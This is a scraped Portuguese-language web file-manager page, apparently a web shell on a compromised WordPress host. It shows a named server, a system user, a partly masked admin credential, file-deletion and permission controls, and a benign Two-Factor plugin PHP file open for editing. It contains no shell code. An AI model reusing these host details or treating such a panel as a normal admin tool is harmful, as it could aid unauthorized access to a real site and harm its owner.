🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_e9b6991e / 7296****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: class-two-factor-compat.php
<?php /** * A compatibility layer for some of the most popular plugins. * * @package Two_Factor */ /** * A compatibility layer for some of the most popular plugins. * * Should be used with care because ideally we wouldn't need * any integration specific code for this plugin. Everything should * be handled through clever use of hooks and best practices. */ class Two_Factor_Compat { /** * Initialize all the custom hooks as necessary. * * @return void */ public function init() { /** * Jetpack * * @see https://wordpress.org/plugins/jetpack/ */ add_filter( 'two_factor_rememberme', array( $this, 'jetpack_rememberme' ) ); } /** * Jetpack single sign-on wants long-lived sessions for users. * * @param boolean $rememberme Current state of the "remember me" toggle. * * @return boolean */ public function jetpack_rememberme( $rememberme ) { $action = filter_input( INPUT_GET, 'action', FILTER_CALLBACK, array( 'options' => 'sanitize_key' ) ); if ( 'jetpack-sso' === $action && $this->jetpack_is_sso_active() ) { return true; } return $rememberme; } /** * Helper to detect the presence of the active SSO module. * * @return boolean */ public function jetpack_is_sso_active() { return ( method_exists( 'Jetpack', 'is_module_active' ) && Jetpack::is_module_active( 'sso' ) ); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar